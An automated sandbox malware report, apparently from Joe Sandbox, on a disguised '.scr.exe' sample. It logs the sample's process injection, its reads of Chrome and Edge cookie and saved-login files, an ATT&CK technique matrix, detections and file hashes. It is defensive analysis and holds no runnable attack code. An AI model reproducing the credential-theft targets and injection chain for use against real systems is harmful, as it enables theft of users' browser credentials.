                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match; File source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.4133191097.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.4133252340.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.1846811096.0000000004D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.1848370775.0000000006CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\control.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\control.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\control.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\control.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\control.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\control.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\control.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\control.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\control.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match; File source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.4133191097.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.4133252340.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.1846811096.0000000004D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.1848370775.0000000006CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 312 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 312 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                [Behavior graph, ID 1510085. Sample: PASU5160894680 DOCS.scr.exe; Startdate: 12/09/2024; Architecture: WINDOWS; Score: 100. Process tree shown: PASU5160894680 DOCS.scr.exe started vbc.exe and powershell.exe (which started conhost.exe); vbc.exe injected uFLByAWAOFbhtV.exe, which started control.exe; control.exe injected uFLByAWAOFbhtV.exe and started firefox.exe.]

                Source | Detection | Scanner | Label | Link
                PASU5160894680 DOCS.scr.exe | 32% | ReversingLabs | |
                PASU5160894680 DOCS.scr.exe | 100% | Avira | TR/AD.Swotter.hefne |
                PASU5160894680 DOCS.scr.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1510085
Start date and time: 2024-09-12 15:04:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 9s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PASU5160894680 DOCS.scr.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@10/7@19/11
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 97
• Number of non-executed functions: 280
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target uFLByAWAOFbhtV.exe, PID 2496 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: PASU5160894680 DOCS.scr.exe
                                                              Time | Type | Description
                                                              09:04:59 | API Interceptor | 1x Sleep call for process: PASU5160894680 DOCS.scr.exe modified
                                                              09:05:01 | API Interceptor | 12x Sleep call for process: powershell.exe modified
                                                              09:05:52 | API Interceptor | 11544586x Sleep call for process: control.exe modified
                                                              Process:C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1216
                                                              Entropy (8bit):5.34331486778365
                                                              Encrypted:false
                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                              Malicious:true
                                                              Reputation:high, very likely benign file
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1172
                                                              Entropy (8bit):5.354777075714867
                                                              Encrypted:false
                                                              SSDEEP:24:3gWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:QWSU4y4RQmFoUeWmfmZ9tK8NDE
                                                              MD5:92C17FC0DE8449D1E50ED56DBEBAA35D
                                                              SHA1:A617D392757DC7B1BEF28448B72CBD131CF4D0FB
                                                              SHA-256:DA2D2B57AFF1C99E62DD8102CF4DB3F2F0621D687D275BFAF3DB77772131E485
                                                              SHA-512:603922B790E772A480C9BF4CFD621827085B0070131EF29DC283F0E901CF783034384F8815C092D79A6EA5DF382EF78AF5AC3D81EBD118D2D5C1E623CE5553D1
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                              Process:C:\Windows\SysWOW64\control.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                              Category:dropped
                                                              Size (bytes):114688
                                                              Entropy (8bit):0.9746603542602881
                                                              Encrypted:false
                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                              Malicious:false
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):7.956043063468761
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              • DOS Executable Generic (2002/1) 0.01%
                                                              File name:PASU5160894680 DOCS.scr.exe
                                                              File size:730'112 bytes
                                                              MD5:6e3e35e593690a43c0fabe9ec9367b67
                                                              SHA1:8f9ed06b7b4d0d3c9b4f34ec66919482abacb7f4
                                                              SHA256:6cc54bd57057a1fc07c2726c351a42f47caef4ae05a2693fbf6b9f693c6761c6
                                                              SHA512:eaa34391eb4097e78c6697add4e239c9a46f78a16ec310a9ba7b42151f5ebade044af449c62658c26fc71aa95362de839ca31153241c08db543544e3320307ab
                                                              SSDEEP:12288:Mn7kvDoQtuCbYItzDzrcP97HCWIfyPVB5WPjuyq6jJMYnJVPJUhGAF0M+d:MnoJfkc7rcM9f4WKUMYJxiM
                                                              TLSH:90F42304B6BC6B61E9BA07FA056082503371B563D562EB8C1ED271DF1FF278897A1E43
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0......4........... ... ....@.. ....................................@................................
                                                              Icon Hash:0ef7966b49af2fae
                                                              Entrypoint:0x4b0de6
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x66E0E7A6 [Wed Sep 11 00:43:18 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb0d94 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb2000 | 0x3200 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb6000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
